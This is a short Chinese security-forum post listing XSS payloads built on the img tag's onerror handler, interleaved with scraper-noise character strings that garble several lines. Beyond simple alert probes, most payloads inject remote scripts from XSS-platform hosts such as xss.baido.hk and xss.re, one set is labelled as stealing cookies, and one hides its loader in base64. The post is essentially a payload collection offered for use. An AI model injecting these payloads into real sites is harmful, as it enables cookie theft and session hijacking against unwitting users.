找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1760|回复: 0
打印 上一主题 下一主题

img标签的常用几种测试手段

[复制链接]
跳转到指定楼层
楼主
发表于 2015-10-18 14:33:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<img src='non-exist.jpg'onerror="alert('xss')">
- [6 |8 f* Z4 g  G7 V: _$ a$ C$ [<img src=# onerror=alert(123)>
" Q4 l) W: A/ m7 r<img src=# onerror=alert(document.cookie)>
2 }/ H* B2 U3 V8 I7 C* Z下面是利用平台钓cookie的- \. u/ R! [6 y& d
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
5 O1 U) s( H8 a( C9 g  n9 h1 ~  J! o" g# `4 ]

- A7 F  b+ L0 A4 _% p<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
* J  e% H6 l; s* `" L<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>& _1 r$ L. ^" I* J- k
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>" e" `# _3 V/ Q2 j. {4 M# L) O
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
- n0 y# b- Y* ~' h- y% W7 N<img src="#">' I0 w. A5 b( A4 Y2 Z6 j
<img src="#">
. U( e: j) W' o, ?6 M# \<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
- n  u9 O/ Y6 X8 R# }/ g<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
* o  h4 o$ s& i: q( b<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
! q7 t; T! E; F& d<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>$ Y& ^+ _9 o! r4 r9 {, [; R* u
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>9 q3 j. d) O- A0 f5 s
<img src=x width="0" height="0"></img>  ?, r& g8 H  Z; n. ], M
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
+ a. j! C" {" `1 G" J<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>3 O" o5 g5 B9 I
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表